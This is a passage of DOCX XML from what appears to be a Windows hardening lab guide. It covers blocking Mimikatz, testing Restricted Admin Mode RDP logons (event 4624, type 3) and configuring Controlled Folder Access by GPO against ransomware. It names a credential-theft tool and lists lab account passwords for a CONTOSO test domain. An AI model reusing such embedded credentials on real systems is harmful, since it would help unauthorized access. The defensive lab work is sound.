      <w:tr w:rsidR="0045498F" w14:paraId="3FA369EA" w14:textId="77777777" w:rsidTr="00D1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814CBE9" w14:textId="072B5FFF" w:rsidR="00F91283" w:rsidRDefault="00F91283" w:rsidP="00D1539E">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="59" w:name="_Hlk528167129"/>
            <w:r w:rsidRPr="00F91283">
              <w:t xml:space="preserve">Are you able to start </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F91283">
              <w:t>application</w:t>
            </w:r>
            <w:r w:rsidR="008C666E">
              <w:t xml:space="preserve"> and explain why</w:t>
            </w:r>
            <w:r w:rsidRPr="00F91283">
              <w:t xml:space="preserve">? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A19379" w14:textId="1CEF1374" w:rsidR="00F91283" w:rsidRDefault="00F91283" w:rsidP="00D1539E">
            <w:r>
              <w:t>Can you audit this error?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="59"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="763CF960" w14:textId="1ACA05AD" w:rsidR="0045498F" w:rsidRDefault="0045498F" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118870FF" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A63A7AD" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc44075695"/>
      <w:r>
        <w:t>Task 3: Playing with Audit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="1C2464CD" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48"/>
    <w:p w14:paraId="3B3BD4DB" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:r>
        <w:t xml:space="preserve">Log on machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-PC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account and password </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cyber-Pwd2018###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01619ADF" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:r>
        <w:t>Then run command: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mstsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>restrictedadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” to connect on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-SRV</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8C6A48" w14:paraId="5DC23BEB"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187F112A" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C6A48" w14:paraId="27F943FB"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818C88" w14:textId="1220975C" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="00554E9A">
            <w:bookmarkStart w:id="61" w:name="_Hlk533213139"/>
            <w:r>
              <w:t>Are you prompt</w:t>
            </w:r>
            <w:r w:rsidR="009A4B90">
              <w:t>ed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to enter your credential?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="61"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20B1B05A" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48"/>
    <w:p w14:paraId="5BC74110" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:r>
        <w:t xml:space="preserve">On VICTIM-SRV, open </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eventlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and filter on event </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4624</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Then search for the latest logon entry for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>logon type 3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617F0E3" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:r>
        <w:t xml:space="preserve">Note: as explained in </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:anchor="ATLT_BM" w:history="1">
        <w:r w:rsidRPr="002C3974">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#ATLT_BM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> logon type 3 (network logon) does not expose reusable credentials on the destination system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80E16C" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="008C6A48">
      <w:r>
        <w:t>Restricted Admin Mode is enabled by default on Windows 10.</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8C6A48" w14:paraId="4528999C"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E54C579" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C6A48" w14:paraId="43E03017"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199C9D1" w14:textId="77777777" w:rsidR="008C6A48" w:rsidRDefault="008C6A48" w:rsidP="00554E9A">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Save the event ID 4624 for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sccmagent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and logon type 3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49B0A769" w14:textId="1913501F" w:rsidR="00D1539E" w:rsidRDefault="00D1539E" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B655252" w14:textId="791420CD" w:rsidR="00D1539E" w:rsidRDefault="00BD4FEC" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD4571" w14:textId="58A34B08" w:rsidR="00BD4FEC" w:rsidRDefault="00BD4FEC" w:rsidP="00BD4FEC">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc44075696"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00877E32">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D43F61">
        <w:t>Configuring and t</w:t>
      </w:r>
      <w:r>
        <w:t>esting Windows Defender Exploit Guard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="583DA97B" w14:textId="22E0C536" w:rsidR="00D1539E" w:rsidRDefault="00D43F61" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
        <w:t>The purpose of this lab is to perform a proof of concept of built-in mechanism to avoid unapproved application writing on protected areas. This is an excellent method to leverage the ransomware attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA5EB8" w14:textId="77777777" w:rsidR="00D43F61" w:rsidRPr="00C6425D" w:rsidRDefault="00D43F61" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE0F966" w14:textId="22A5FBD3" w:rsidR="00D1539E" w:rsidRPr="00C6425D" w:rsidRDefault="00AF13F0" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Hlk528190865"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Protect Folder:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:p w14:paraId="5D3DC984" w14:textId="6CF45237" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">On VICTIM-PC logon with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and password </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>FY19-ECE#Pwd!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402ECE8" w14:textId="391C66E8" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a folder </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>C:\WorkFolder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the machine.</w:t>
      </w:r>
      <w:r w:rsidR="00B82485">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create file </w:t>
      </w:r>
      <w:r w:rsidR="00B82485" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Test.txt</w:t>
      </w:r>
      <w:r w:rsidR="00B82485">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> in C:\WorkFolder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2409071A" w14:textId="7E2AC1FA" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>mmc.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add snap-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Group Policy Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4960961F" w14:textId="75F5F18C" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Expend </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Forest / Domains / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ontoso.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> / LAB / COMPUTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select option “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Create a GPO in this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>domain, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> link it here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Give </w:t>
      </w:r>
      <w:r w:rsidR="003C3F18" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CFA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>name to the new GPO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8254A" w14:textId="179A5C04" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Edit CFA GPO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA8B17" w14:textId="77777777" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="007E7E37">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Expand </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Administrative Templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows Components</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows Defender Antivirus</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows Defender Exploit Guard</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Controlled Folder Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDA0EB" w14:textId="18589E80" w:rsidR="00766ADB" w:rsidRPr="00C6425D" w:rsidRDefault="00766ADB" w:rsidP="007E7E37">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Configure Controlled folder access</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00766ADB">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E107E78" w14:textId="3B2845E3" w:rsidR="00522984" w:rsidRDefault="00522984" w:rsidP="00C56AB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00522984">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27DF456D" wp14:editId="428C953F">
            <wp:extent cx="5116320" cy="47498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1339" cy="4754460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFA6A4" w14:textId="130DF90C" w:rsidR="00766ADB" w:rsidRPr="00C6425D" w:rsidRDefault="00766ADB" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Configure protected folders</w:t>
      </w:r>
      <w:r w:rsidRPr="007E7E37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Value name</w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:t xml:space="preserve"> column add </w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:\Work</w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Folder</w:t>
      </w:r>
      <w:r w:rsidR="007E7E37">
        <w:t xml:space="preserve">, then in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Value</w:t>
      </w:r>
      <w:r w:rsidR="007E7E37">
        <w:t xml:space="preserve"> column type </w:t>
      </w:r>
      <w:r w:rsidR="007E7E37" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C249E" w14:textId="77777777" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400253F6" w14:textId="038DB39D" w:rsidR="00766ADB" w:rsidRDefault="00766ADB" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766ADB">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E304CE6" wp14:editId="1FB1CA4E">
            <wp:extent cx="5270500" cy="4870404"/>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3853" cy="4873502"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086EF57" w14:textId="56AE5AF1" w:rsidR="003C3F18" w:rsidRDefault="00522984" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Close the GPO editor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">On VICTIM-PC, from elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>, run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>gpupdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="007E43D3">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> then restart the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F1ABA" w14:textId="6E39CA04" w:rsidR="003C3F18" w:rsidRDefault="003C3F18" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
